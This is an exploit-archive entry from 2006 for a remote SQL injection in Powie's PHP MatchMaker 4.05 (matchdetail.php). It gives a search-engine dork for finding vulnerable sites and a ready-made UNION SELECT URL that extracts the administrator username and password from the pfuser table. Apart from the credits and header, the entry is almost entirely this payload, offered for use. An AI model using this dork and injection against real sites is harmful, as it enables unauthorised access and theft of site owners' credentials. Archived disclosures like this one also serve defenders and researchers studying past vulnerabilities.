Powies MatchMaker 4.05 (matchdetail.php) SQL Injection Vulnerability

2006-11-17T00:00:00
ID 1337DAY-ID-1175
Type zdt
Reporter SHiKaA
Modified 2006-11-17T00:00:00

Description

Exploit for unknown platform in category web applications

                                        
                                            ====================================================================
Powies MatchMaker 4.05 (matchdetail.php) SQL Injection Vulnerability
====================================================================



#==============================================================================================
#Powie's PHP MatchMaker <= v4.05 (matchdetail) Remote SQL Injection Exploit
#===============================================================================================
#                                                                     
#Critical Level : Dangerous                                           
#                                                                     
#Venedor site : http://www.powie.de    
#                                                                     
#Version : v4.05
#
#===============================================================================================
#
#DORK :  "Powie's PSCRIPT MatchMaker 4.05"                                        
#                                                       
#
#Exploit :
#--------------------------------
#
#http://target.com/(path to script)/matchdetail.php?edit=-1 UNION SELECT 0,0,0,pwd,0,0,0,0,0,username,0,0,0,0 FROM pfuser WHERE id=1
#
#================================================================================================
#Discoverd By : SHiKaA
#
#Thx To : Str0ke & SuperRomio & XoRon & MDx & Simo
# sPECial THanks to : CaMpA , [email protected]
==================================================================================================



#  0day.today [2018-03-02]  #